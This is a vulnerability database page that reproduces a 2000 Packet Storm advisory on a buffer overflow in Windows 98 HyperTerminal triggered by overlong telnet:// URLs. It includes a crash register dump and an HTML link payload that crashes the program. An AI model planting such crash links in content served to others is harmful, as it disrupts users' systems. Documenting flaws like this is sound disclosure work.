Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

adv_telnet1.txt

🗓️ 07 Sep 2000 00:00:00Reported by Meliksah OzoralType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 15 Views

Windows HyperTerminal has a buffer overflow vulnerability triggered by long telnet URLs.

Code
` /\__ ____ _ /\____ /\__ ____   
\_ \ / _//\_ /:\ /\ /\_ ___ /\____ \___ \ \_ | _/   
/ : \/ . \ . | (__) | \. )\___ \ / .) \ / : \   
/ . . \ \_) . | / \ | / ( )__) / \ / \   
( ( ) )._) |___( )| . \ /\_. \( : )( : )   
\__/\_/\ /_ )_____ )\ / \__\_ )\____ )\___|_ / \___|_ /   
\/ \/ \/ \/ \/ \/ \/ \/   
---------------------------------------------------Meliksah Ozoral   
[E-mail [email protected]]------------------------------------  
----------------------------------------------------[ICQ 10390761]  
[telnet:// Buffer Overflow Vulnereability]------------------------  
------------------------------------------------------[05/09/2000]  
[www.meliksah.net]------------------------------------------------  
  
Hi,  
I don't know if this has been reported before. Windows run default telnet program when it get link like telnet://somehost in exp  
lorer.  
Default telnet program is HyperTerminal under Windows 98 (NOT NT).  
Windows Call HyperTerminal, when I wrote telnet://www.meliksah.net in internet explorer. telnet://153 characters long hostname c  
ause  
buffer overflow in HyperTerminal.  
HYPERTRM caused an invalid page fault in  
module HYPERTRM.DLL at 0177:7d9fdcf4.  
Registers:  
EAX=00000065 CS=0177 EIP=7d9fdcf4 EFLGS=00010206  
EBX=00000000 SS=017f ESP=0063f8e4 EBP=0063f91c  
ECX=0063fc1c DS=017f ESI=00000065 FS=5c3f  
EDX=00000000 ES=017f EDI=00665d50 GS=7c7f  
Bytes at CS:EIP:  
8b 7e 08 8d 9f 08 01 00 00 53 ff 15 f8 86 a2 7d   
Stack dump:  
00665d50 0066593c 00000000 7da1b94b 00000065 000006f8 0066593c 274d0010  
7d9f4222 00663900 00000002 0063f9b0 00000050 7da1ad25 0063fa00 7da1ad5e   
  
I didn't try ro run code by using this bug but we can use this bug on remote computers.  
<p><ahref="telnet://meliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahn  
etmeliksahnetmeliksahnetmeliksahnetmeliksahne">Click Here</a></p>  
This URL cause crash HyperTerminal.  
  
This bug tested on  
Windows 98 [Version 4.10.1998]  
Windows 98 [Version 4.10.2222]  
  
  
\___ \/ ___/ E  
/ \ L __/\__  
_/ \_ I \ OO /  
\ \ / / K / \/ \  
\\ //\/\\ // $ ~~\/~~  
\\ / \\ / A 2000  
\/ \/ H  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Sep 2000 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow vulnerabilitywindows hyperterminaltelnet url crashinvalid page faultremote exploit
15